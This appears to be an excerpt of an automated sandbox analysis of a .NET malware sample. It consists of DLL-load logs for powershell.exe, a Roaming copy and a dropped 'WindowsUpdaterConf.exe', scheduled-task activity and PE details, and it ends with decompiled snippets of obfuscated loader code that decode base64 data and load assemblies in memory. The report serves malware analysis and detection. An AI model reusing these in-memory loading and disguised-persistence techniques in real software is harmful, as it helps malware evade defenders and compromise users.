                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                            Source: C:\Users\user\AppData\Roaming\file.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Roaming\file.exeSection loaded: apphelp.dll
                            Source: C:\Users\user\AppData\Roaming\file.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Roaming\file.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Roaming\file.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\file.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\file.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\file.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Roaming\file.exeSection loaded: amsi.dll
                            Source: C:\Users\user\AppData\Roaming\file.exeSection loaded: userenv.dll
                            Source: C:\Users\user\AppData\Roaming\file.exeSection loaded: profapi.dll
                            Source: C:\Users\user\AppData\Roaming\file.exeSection loaded: msasn1.dll
                            Source: C:\Users\user\AppData\Roaming\file.exeSection loaded: gpapi.dll
                            Source: C:\Users\user\AppData\Roaming\file.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                            Source: C:\Users\user\AppData\Roaming\file.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Roaming\file.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Roaming\file.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Roaming\file.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\file.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\file.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Roaming\file.exeSection loaded: amsi.dll
                            Source: C:\Users\user\AppData\Roaming\file.exeSection loaded: userenv.dll
                            Source: C:\Users\user\AppData\Roaming\file.exeSection loaded: profapi.dll
                            Source: C:\Users\user\AppData\Roaming\file.exeSection loaded: msasn1.dll
                            Source: C:\Users\user\AppData\Roaming\file.exeSection loaded: gpapi.dll
                            Source: C:\Users\user\AppData\Roaming\file.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exeSection loaded: apphelp.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exeSection loaded: version.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exeSection loaded: wldp.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exeSection loaded: amsi.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exeSection loaded: userenv.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exeSection loaded: profapi.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exeSection loaded: msasn1.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exeSection loaded: gpapi.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exeSection loaded: wbemcomn.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exeSection loaded: version.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exeSection loaded: wldp.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exeSection loaded: amsi.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exeSection loaded: userenv.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exeSection loaded: profapi.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exeSection loaded: msasn1.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exeSection loaded: gpapi.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exeSection loaded: wbemcomn.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exeSection loaded: version.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exeSection loaded: wldp.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exeSection loaded: amsi.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exeSection loaded: userenv.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exeSection loaded: profapi.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exeSection loaded: msasn1.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exeSection loaded: gpapi.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exeSection loaded: wbemcomn.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exeSection loaded: version.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exeSection loaded: wldp.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exeSection loaded: amsi.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exeSection loaded: userenv.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exeSection loaded: profapi.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exeSection loaded: msasn1.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exeSection loaded: gpapi.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exeSection loaded: wbemcomn.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exeSection loaded: version.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exeSection loaded: wldp.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exeSection loaded: amsi.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exeSection loaded: userenv.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exeSection loaded: profapi.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exeSection loaded: msasn1.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exeSection loaded: gpapi.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exeSection loaded: wbemcomn.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exeSection loaded: version.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exeSection loaded: wldp.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exeSection loaded: amsi.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exeSection loaded: userenv.dll
                            Source: C:\Users\user\WindowsUpdaterConf.exeSection loaded: profapi.dll
                            Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                            Source: Window RecorderWindow detected: More than 3 window changes detected
                            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                            Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                            Source: file.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                            Source: file.exeStatic file information: File size 3507712 > 1048576
                            Source: file.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x357c00
                            Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Source: Binary string: mscorlib.pdba source: WER3CD5.tmp.dmp.42.dr
                            Source: Binary string: System.Management.pdbTz source: WERB32D.tmp.dmp.19.dr
                            Source: Binary string: System.pdbMZ@ source: WER5266.tmp.dmp.39.dr, WERD403.tmp.dmp.24.dr, WERFCA9.tmp.dmp.29.dr, WER3CD5.tmp.dmp.42.dr, WER3E37.tmp.dmp.35.dr
                            Source: Binary string: mscorlib.pdb source: WER5266.tmp.dmp.39.dr, WERB32D.tmp.dmp.19.dr, WERD403.tmp.dmp.24.dr, WERFCA9.tmp.dmp.29.dr, WER3CD5.tmp.dmp.42.dr, WER1C95.tmp.dmp.32.dr, WER3E37.tmp.dmp.35.dr
                            Source: Binary string: mscorlib.pdbSystem.Management.ni.dll source: WERB32D.tmp.dmp.19.dr
                            Source: Binary string: System.ni.pdbRSDS source: WER5266.tmp.dmp.39.dr, WERB32D.tmp.dmp.19.dr, WERD403.tmp.dmp.24.dr, WERFCA9.tmp.dmp.29.dr, WER3CD5.tmp.dmp.42.dr, WER1C95.tmp.dmp.32.dr, WER3E37.tmp.dmp.35.dr
                            Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER5266.tmp.dmp.39.dr, WERB32D.tmp.dmp.19.dr, WERD403.tmp.dmp.24.dr, WERFCA9.tmp.dmp.29.dr, WER3CD5.tmp.dmp.42.dr, WER1C95.tmp.dmp.32.dr, WER3E37.tmp.dmp.35.dr
                            Source: Binary string: System.Management.pdb source: WER5266.tmp.dmp.39.dr, WERB32D.tmp.dmp.19.dr, WERD403.tmp.dmp.24.dr, WERFCA9.tmp.dmp.29.dr, WER3CD5.tmp.dmp.42.dr, WER1C95.tmp.dmp.32.dr, WER3E37.tmp.dmp.35.dr
                            Source: Binary string: System.Management.pdbL0 source: WER5266.tmp.dmp.39.dr
                            Source: Binary string: mscorlib.ni.pdb source: WER5266.tmp.dmp.39.dr, WERB32D.tmp.dmp.19.dr, WERD403.tmp.dmp.24.dr, WERFCA9.tmp.dmp.29.dr, WER3CD5.tmp.dmp.42.dr, WER1C95.tmp.dmp.32.dr, WER3E37.tmp.dmp.35.dr
                            Source: Binary string: System.Management.ni.pdb source: WER5266.tmp.dmp.39.dr, WERB32D.tmp.dmp.19.dr, WERD403.tmp.dmp.24.dr, WERFCA9.tmp.dmp.29.dr, WER3CD5.tmp.dmp.42.dr, WER1C95.tmp.dmp.32.dr, WER3E37.tmp.dmp.35.dr
                            Source: Binary string: mscorlib.ni.pdbRSDS source: WER5266.tmp.dmp.39.dr, WERB32D.tmp.dmp.19.dr, WERD403.tmp.dmp.24.dr, WERFCA9.tmp.dmp.29.dr, WER3CD5.tmp.dmp.42.dr, WER1C95.tmp.dmp.32.dr, WER3E37.tmp.dmp.35.dr
                            Source: Binary string: System.ni.pdb source: WER5266.tmp.dmp.39.dr, WERB32D.tmp.dmp.19.dr, WERD403.tmp.dmp.24.dr, WERFCA9.tmp.dmp.29.dr, WER3CD5.tmp.dmp.42.dr, WER1C95.tmp.dmp.32.dr, WER3E37.tmp.dmp.35.dr
                            Source: Binary string: System.pdb source: WER5266.tmp.dmp.39.dr, WERB32D.tmp.dmp.19.dr, WERD403.tmp.dmp.24.dr, WERFCA9.tmp.dmp.29.dr, WER3CD5.tmp.dmp.42.dr, WER1C95.tmp.dmp.32.dr, WER3E37.tmp.dmp.35.dr

                            Data Obfuscation

                            barindex
                            .NET source code contains method to dynamically call methods (often used by packers)
                            Source: file.exe, -----------.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                            Source: 0.2.file.exe.5e50000.3.raw.unpack, -----------.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                            Source: 0.2.file.exe.3719ccc.0.raw.unpack, J5e1oSdTyjHJTArIKP3ktQ0lfAAlVsLA2NCnVW2MwPfQq52qM1YvhW3yGP76923m.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{JGZNkhPYy51rKLOP0bhlu4smsylhhcdLgDbJFtAZtDL8up910PQ3DgJmflK3VNrQlP6UtXkQk3ItloK.IjGr4YLfq6ijOuhv3diB7pNzZwwyBPbCztmh9eRlHElrXHmRDoiK68AVMhUSxyIxqhjzChpTZLwhSIv,JGZNkhPYy51rKLOP0bhlu4smsylhhcdLgDbJFtAZtDL8up910PQ3DgJmflK3VNrQlP6UtXkQk3ItloK.inOjD2O8oEDkXMFMRN8gW7zbSQaNS7BCp4dPTlA5sZkZtKL5eM702mVfdAsvoSdhXmFtwcQMVRNfEmC,JGZNkhPYy51rKLOP0bhlu4smsylhhcdLgDbJFtAZtDL8up910PQ3DgJmflK3VNrQlP6UtXkQk3ItloK.eSM1sfzUBy3OQSyBxSn1haFL33UvSZyUGI6N9IzNp1YXGfgSJPqk0tSAPcwwM9nJF8l9v46u4JZWgH2,JGZNkhPYy51rKLOP0bhlu4smsylhhcdLgDbJFtAZtDL8up910PQ3DgJmflK3VNrQlP6UtXkQk3ItloK._2a1mQ9wTLxzDD0eN59an1BzZLBRaHeiHMVwE4pV9vwMCqBsZYJClyCLyB3ajywyGIG5QJAdkxdml1px,_9a0DjQ85k3MQx9Tn1q3XhVQg0xirCWFQe8q2lNoCpBl3P92foFHJ9LE21sIAHC9VEkE0lAd4azo8aU2gNo.SXaaDM5JN9FfkPKU1X0uay61()}}, (string[])null, (Type[])null, (bool[])null, true)
                            Source: 0.2.file.exe.3719ccc.0.raw.unpack, J5e1oSdTyjHJTArIKP3ktQ0lfAAlVsLA2NCnVW2MwPfQq52qM1YvhW3yGP76923m.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{EvuvFrqSwjtrh2F3k3Vf3A4Z1ncG0nlsiXYUe28i7JZ6WM47OTKXf2iulQHK3oiJ0JBKVOcmZDxp191zdYyyhoTO1SBOtW3jQ[2],_9a0DjQ85k3MQx9Tn1q3XhVQg0xirCWFQe8q2lNoCpBl3P92foFHJ9LE21sIAHC9VEkE0lAd4azo8aU2gNo.sLcavHXRSWjgrpZMcskEPn7i(Convert.FromBase64String(EvuvFrqSwjtrh2F3k3Vf3A4Z1ncG0nlsiXYUe28i7JZ6WM47OTKXf2iulQHK3oiJ0JBKVOcmZDxp191zdYyyhoTO1SBOtW3jQ[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                            Source: 0.2.file.exe.372e50c.1.raw.unpack, J5e1oSdTyjHJTArIKP3ktQ0lfAAlVsLA2NCnVW2MwPfQq52qM1YvhW3yGP76923m.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{JGZNkhPYy51rKLOP0bhlu4smsylhhcdLgDbJFtAZtDL8up910PQ3DgJmflK3VNrQlP6UtXkQk3ItloK.IjGr4YLfq6ijOuhv3diB7pNzZwwyBPbCztmh9eRlHElrXHmRDoiK68AVMhUSxyIxqhjzChpTZLwhSIv,JGZNkhPYy51rKLOP0bhlu4smsylhhcdLgDbJFtAZtDL8up910PQ3DgJmflK3VNrQlP6UtXkQk3ItloK.inOjD2O8oEDkXMFMRN8gW7zbSQaNS7BCp4dPTlA5sZkZtKL5eM702mVfdAsvoSdhXmFtwcQMVRNfEmC,JGZNkhPYy51rKLOP0bhlu4smsylhhcdLgDbJFtAZtDL8up910PQ3DgJmflK3VNrQlP6UtXkQk3ItloK.eSM1sfzUBy3OQSyBxSn1haFL33UvSZyUGI6N9IzNp1YXGfgSJPqk0tSAPcwwM9nJF8l9v46u4JZWgH2,JGZNkhPYy51rKLOP0bhlu4smsylhhcdLgDbJFtAZtDL8up910PQ3DgJmflK3VNrQlP6UtXkQk3ItloK._2a1mQ9wTLxzDD0eN59an1BzZLBRaHeiHMVwE4pV9vwMCqBsZYJClyCLyB3ajywyGIG5QJAdkxdml1px,_9a0DjQ85k3MQx9Tn1q3XhVQg0xirCWFQe8q2lNoCpBl3P92foFHJ9LE21sIAHC9VEkE0lAd4azo8aU2gNo.SXaaDM5JN9FfkPKU1X0uay61()}}, (string[])null, (Type[])null, (bool[])null, true)
                            Source: 0.2.file.exe.372e50c.1.raw.unpack, J5e1oSdTyjHJTArIKP3ktQ0lfAAlVsLA2NCnVW2MwPfQq52qM1YvhW3yGP76923m.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{EvuvFrqSwjtrh2F3k3Vf3A4Z1ncG0nlsiXYUe28i7JZ6WM47OTKXf2iulQHK3oiJ0JBKVOcmZDxp191zdYyyhoTO1SBOtW3jQ[2],_9a0DjQ85k3MQx9Tn1q3XhVQg0xirCWFQe8q2lNoCpBl3P92foFHJ9LE21sIAHC9VEkE0lAd4azo8aU2gNo.sLcavHXRSWjgrpZMcskEPn7i(Convert.FromBase64String(EvuvFrqSwjtrh2F3k3Vf3A4Z1ncG0nlsiXYUe28i7JZ6WM47OTKXf2iulQHK3oiJ0JBKVOcmZDxp191zdYyyhoTO1SBOtW3jQ[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                            .NET source code contains potential unpacker
                            Source: 0.2.file.exe.3719ccc.0.raw.unpack, J5e1oSdTyjHJTArIKP3ktQ0lfAAlVsLA2NCnVW2MwPfQq52qM1YvhW3yGP76923m.cs.Net Code: OmjWgTAeGmfM5NH1PU2ayDN2d4BU5PFWyPvCON6jSXMM83Gdj12K4LIpZrP6T7nS System.AppDomain.Load(byte[])
                            Source: 0.2.file.exe.3719ccc.0.raw.unpack, J5e1oSdTyjHJTArIKP3ktQ0lfAAlVsLA2NCnVW2MwPfQq52qM1YvhW3yGP76923m.cs.Net Code: zqbko5LizBSf5zeVhxZwzoKXdCgYLTJLpygcvNVbhjmw1NByAweg3c1HiND4axyvnHQ3bWNCkWqOnItEn2Ae848Sm6pdbu5kq System.AppDomain.Load(byte[])
